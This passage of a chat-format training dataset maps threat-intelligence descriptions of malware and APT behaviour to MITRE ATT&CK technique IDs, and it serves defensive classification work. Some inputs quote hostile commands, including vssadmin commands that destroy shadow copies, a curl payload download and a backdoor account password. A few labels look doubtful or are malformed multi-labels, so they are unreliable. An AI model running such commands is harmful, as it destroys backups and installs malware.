- "content": "RawDisk has been used to directly access the hard disk to help overwrite arbitrarily sized portions of disk content."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The document is disguised from the Colombian National Civil Registry and uses Spanish to prompt the victim to enable the macro code in order to execute the subsequent payload"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the Whois Anchor Panda blog post"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses RC4 to encrypt the message body of HTTP content."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Peirates can deploy a pod that mounts its node’s root file system, then execute a command to create a reverse shell on the node."
- },
- {
- "role": "assistant",
- "content": "T1610 - Deploy a container"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Impacket can be used to sniff network traffic via an interface or raw socket."
- },
- {
- "role": "assistant",
- "content": "T1040 - Network Sniffing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS has a command to take a screenshot and send it to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can gather user names."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot can gather information about domain trusts by utilizing Nltest."
- },
- {
- "role": "assistant",
- "content": "T1482 - Domain Trust Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it Figure 2: Configuration file that adds TCP tunnels and records desktop video Command and Control CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke has a command to get text of the current foreground window."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has created scheduled tasks for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Denis has several commands to search directories for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An example of these tasks is shown below: • write a file and execute it with CreateProcess() capturing all of the standard output • update C&C configuration, plugin storage, etc • update autoruns • write arbitrary files to the filesystem (“File Upload”) • read arbitrary files from the filesystem (“File Download”) • update itself • uninstall • push task results to C2 servers"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can use ipconfig and Arp to collect network configuration information, including routing information and ARP tables."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware sets information like the C2 server, ID, the downloaded payload, and the decoded project.aspx in a registry key under “HKCU\\Software\\ApplicationContainer\\Appsw64”. These keys will be used in the second stage"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When accessing the Pastebin URL, an encrypted blob is downloaded that requires a corresponding RSA private key from the configuration file. The configuration file analyzed did not contain the RSA private key and therefore we were unable to decrypt the contents of the Pastebin link. We assess the decrypted blob was likely a task for the Carbon instance"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leafminer used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth uses the filename owaauth.dll, which is a legitimate file that normally resides in \"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Auth\\\"; the malicious file by the same name is saved in \"%ProgramFiles%\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\bin\\\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Goopy's decrypter have been inflated with junk code in between legitimate API functions, and also included infinite loops to avoid analysis."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can delete files from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has used Tor nodes for C2 traffic."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell can obtain a list of user accounts from a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Extracting and dropping an OpenSSH binary from its PE resources - Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources - Creating a new user “supportaccount” with a password of “Ghar4f5” - Adding this user to the “Remote Desktop Users” and “Administrators” groups"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT12 has used RIPTIDE, a RAT that uses HTTP to communicate."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zips up files before exfiltrating them."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used Metasploit to perform reflective DLL injection in order to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 created tokens using compromised SAML signing certificates."
- },
- {
- "role": "assistant",
- "content": "T1606.002 - Forge Web Credentials: SAML token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a module to receive a notification every time a USB mass storage device is inserted into a victim."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris has been packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object"
- },
- {
- "role": "assistant",
- "content": "T1497.002 - User Activity Based Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER has created forged Kerberos Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) tickets to maintain administrative access."
- },
- {
- "role": "assistant",
- "content": "T1550.003 - Use Alternate Authentication Material: Pass the Ticket"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In our analysis, the macro is obfuscated, character by character, using the decimal ASCII code"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy enumerates the current user during the initial infection."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These anti-forensic recovery commands are quite interesting and appear to make use of an undocumented feature of the vssadmin resize command. While the first command in Figure 2 above, vssadmin Delete Shadows /all /quiet, is commonly used by ransomware, the command option vssadmin resize shadowstorage is rarely used. In situations where shadow copies were not created by vssadmin, but by third-party applications (such as backup software), vssadmin can display an error and not delete the backups. Try removing them with the backup application which created them. The vssadmin resize shadowstorage command is a “hack” that relies on vssadmin to delete storage when the shadow copies are resized. It forces the shadow copies to be deleted regardless of their context. The command works by resizing the default shadow volume size from 10 percent to 401 MB (the minimum size is 300 MB). Then the shadow storage is set to unbounded, which allows it to use all available disk space. The shadow copies are then deleted by calling the command vssadmin Delete Shadows /all /quiet a second time"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Machete has used batch files to initiate additional downloads of malicious files."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used CMSTP.exe and a malicious INF to execute its POWERSTATS payload."
- },
- {
- "role": "assistant",
- "content": "T1218.003 - Signed Binary Proxy Execution: CMSTP"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has sent spearphishing emails containing malicious links."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT38 has created new services or modified existing ones to run executables, commands, or scripts."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dyre injects into other processes to load modules."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A menuPass macro deletes files after it has decoded and decompressed them."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "connects over 443 for C2."
- },
- {
- "role": "assistant",
- "content": "T1043 - Commonly Used Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Team member or team identifier Analysis of the OwaAuth web shell revealed a PDB string with the \"SyberSpace\" username (see Figure 20)"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has identified specific potential victims at targeted organizations."
- },
- {
- "role": "assistant",
- "content": "T1589 - Gather Victim Identity Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer can download payloads, and extract bytes from files. OSX/Shlayer uses the \"curl -fsL \"$url\" >$tmp_path\" command to download malicious payloads into a temporary directory."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If that HTTPS request is not successful, the downloader will issue an HTTP request"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kivars has the ability to capture screenshots on the infected host."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer can establish persistence through the system screensaver by configuring it to execute the malware."
- },
- {
- "role": "assistant",
- "content": "T1546.002 - Event Triggered Execution: Screensaver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout can Base64 encode payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can set values in the Registry to help in execution."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data field within the message is a string of custom base64 encoded data that the malware decodes using the same custom base64 routine mentioned earlier and decrypts it using AES and the pre-shared key"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1140 - Deobfuscate/Decode Files or Information', 'T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim’s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button"
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE used documents deploying Visual Basic Script (VBS), potentially delivered through spear phishing, decoys with Arabic content, occasionally associated with Palestinian matters"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Learn more about our Personal Data Protection PolicyAccept Cookies . DeepMalwareAnalysis . Joe Security's Blog . TrickBot's new API-Hammering explained . Published on: 13.07.2020 As usual, at Joe Security, we keep a close eye on evasive malware. It turned out to be a new TrickBot sample using API hammering to bypass analysis. Two Stage API Hammering . Right after the entry point, the sample tries to load taskmgr.exe as a DLL: This is likely a trick to bypass emulators that do not check if a given DLL exists if LoadLibraryEx is called. Since before the loop FreeConsole has been called all printf calls do basically nothing: This code has been directly copied from the documentation of printf: So what is the purpose of those numerous printf loops. As a result, the massive amount of calls delay the execution process and overload the sandbox with junk data. This behavior is called API Hammering. API Hammering is not a new technique, we have already seen it several years ago e.g. Joe Sandbox detects the API hammering successfully and rates it as malicious: Right after the printf flood, the sample performs another loop to delay execution by creating and writing to a temporary file - the second stage. In between it performs random sleeps: Again, the purpose is to overload the sandbox and delay the execution. No matter what technology your favorite sandbox uses, it has to handle API Hammering correctly"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has leveraged malicious Word documents that abused DDE."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In cases where spam attachments could be verified — once a user has opened the attachment and enabled macro functionality — a PowerShell script downloads either Emotet, Bokbot or Trickbot, with the end payload being TrickBot"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Then, they are using the process hollowing technique to hide the execution of these tools inside of the original Microsoft vbc.exe (VisualBasic Compiler) process"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has used uname -m to collect the name and information about the infected system's kernel."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zebrocy searches for files that are 60mb and less and contain the following extensions: .doc, .docx, .xls, .xlsx, .ppt, .pptx, .exe, .zip, and .rar. Zebrocy also runs the \"echo %APPDATA%\" command to list the contents of the directory. Zebrocy can obtain the current execution path as well as perform drive enumeration."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at: HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has used PowerShell for execution and privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to gather the victim's proxy information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
